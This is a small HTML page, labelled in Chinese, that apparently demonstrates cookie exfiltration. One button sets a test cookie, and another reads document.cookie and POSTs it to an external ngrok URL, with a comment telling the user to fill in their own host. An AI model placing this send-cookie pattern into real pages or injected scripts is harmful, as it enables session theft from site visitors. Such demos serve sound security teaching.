<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h1>領取你得cookie吧</h1>
    <button type="button" onclick="get()">點我拿cookie</button>
    <h1>送出你的cookie</h1>
    <button type="button" onclick="send()">點我送出cookie</button>

    <script>
        function get(){
            document.cookie = "mycookie=yummy";            
        }

        function send(){
            var flag = document.cookie;
            
            <!--填入你的host吧-->
            fetch('https://6603-185-213-82-83.ngrok-free.app/', {
                method: 'POST',
                headers: {
                  
                },
                body: JSON.stringify({
                    'cookie': flag,
                    '餅乾': '好吃'
                })
            });
        }
        
    </script>
</body>
</html>